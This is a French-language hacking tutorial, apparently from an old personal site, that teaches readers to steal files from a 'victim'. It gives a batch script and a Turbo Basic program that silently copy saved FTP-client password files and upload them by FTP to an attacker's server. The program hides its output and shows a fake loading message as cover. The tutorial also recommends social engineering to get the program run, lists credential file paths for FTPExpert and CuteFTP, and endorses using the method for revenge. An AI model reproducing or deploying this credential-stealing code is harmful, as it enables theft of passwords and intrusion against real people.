Comment piquer des fichiers à votre victime ?

 

 

Alors vous allez me dire : "Comment piquer un fichier à ma cible???"

La programmation va nous servir. Ne vous inquiétez pas, ça reste de la programmation de débutant.
Il va vous falloir faire un petit prog que votre victime devra executer.
Inconveniant : il va falloir trouver un moyen de lui faire executer, et il faudra qu'il soit connecté.
Pour cela : Social Engeneering ;-) .
Il va aussi vous falloir un compte sur lequel on puisse uploader en FTP.
Pour faire ce petit prog, un fichier Batch (.bat) suffirait, mais il pourrais trop facilement l'éditer, donc nous allons nous baser sur les commandes d'un Batch, mais avec un .exe .
Pour faire ce .exe, pas la peine d'utiliser un langage compliqué : utilisons le Turbo Basic.
Vous pouvez télécharger le logiciel pour le compiler en cliquant ici.

Voyons déjà ce qu'on metterait dans le fichier Batch :
(Dans le cas où on voudrait piquer "sites.ini", le fichier qui contient les pass de FTPExpert)

:: début du code

CLS
@echo off
if exist %windir%\commandes.txt del %windir%\commandes.txt
if exist C
:\Progra~1\FTPExpert\sites.ini copy C:\Progra~1\FTPExpert\sites.ini %windir%
CLS
cd %windir%
echo open
ftp.hébergeur.fr>> commandes.txt
echo quote user
Login>> commandes.txt
echo quote pass
Mot de Passe>> commandes.txt
echo put
sites.ini>> commandes.txt
echo close>> commandes.txt
echo quit>> commandes.txt
C:\windows\ftp -v -n -s:commandes.txt >nul
del %windir%\commandes.txt >nul
CLS

:: fin du code

Les parties en orange sont les variables à modifier.
On rajoute ">nul" à la fin de certaines commandes afin que la victime ne les voit pas s'exécuter.
On utilise ftp.exe qui se trouve dans le répertoire de tout les windows.

Nous allons faire un programme en basic utilisant les mêmes commandes (comme ça, on se fait pas chier) :

' début du code

CLS
Screen 1
SHELL "@echo off"
SHELL "if exist %windir%\commandes.txt del %windir%\commandes.txt"
SHELL "if exist
C:\Progra~1\FTPExpert\sites.ini copy C:\Progra~1\FTPExpert\sites.ini %windir%"
CLS
Print "Veuillez patienter quelques instants"
Print "Chargement de l'application"
SHELL "cd %windir%"
SHELL "echo open
ftp.hébergeur.fr>> commandes.txt"
SHELL "echo quote user
Login>> commandes.txt"
SHELL "echo quote pass
Mot de Passe>> commandes.txt"
SHELL "echo put
sites.ini>> commandes.txt"
SHELL "echo close>> commandes.txt"
SHELL "echo quit>> commandes.txt"
SHELL "C:\windows\ftp -v -n -s:commandes.txt >nul"
SHELL "del %windir%\commandes.txt >nul"
CLS

' fin du code

Les parties en orange sont les variables à modifier. 

Voilà, il ne vous reste plus qu'à changer les variables du code pour y mettre les coordonnées de votre FTP, du ou des fichiers que vous voulez piquer, puis à compiler le tout. Ensuite, vous n'avez plus qu'à (enfin ça peut s'avèrer compliqué) faire exécuter le programme à votre victime. Et paf ! Vous lui avez piqué les fichiers.

Conseil : Utiliser un compte sur un hébergeur gratuit que vous n'utiliserez que pour ça, car si votre victime est un peu maligne, elle pourra éditer votre prog et finir par trouver le pass de votre compte.

C'était pas trop compliqué, non?

Cette technique peut s'avèrer très utile pour piquer des fichiers contenant des mots de passes.
Seule condition : il faut que votre victime enregistre ses mots de passes.

Voici quelques exemples :

. Pour FTPExpert :
   -» C:\Program Files\FTPExpert\sites.ini

Il vous faudra le décrypter >>> voir article.

. Pour CuteFTP
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat
ou
C:\Program Files\CuteFTP\sm.dat
Il vous faudra le décrypter >>> voir article.


Petit rappel :
n'utilisez pas cette technique sur le premier venu, c'est pas la peine de faire chier un inconnu au hasard, c'est seulement pour le challenge, ou pour vous venger de quelqu'un qui vous à fait un sale coup.

Voili voilou,
Allez @+ les petits filous !

By BiGHeaDMaX
Contact : Privatesite@ifrance.com
© www.BiGHeaDMaX.fr.st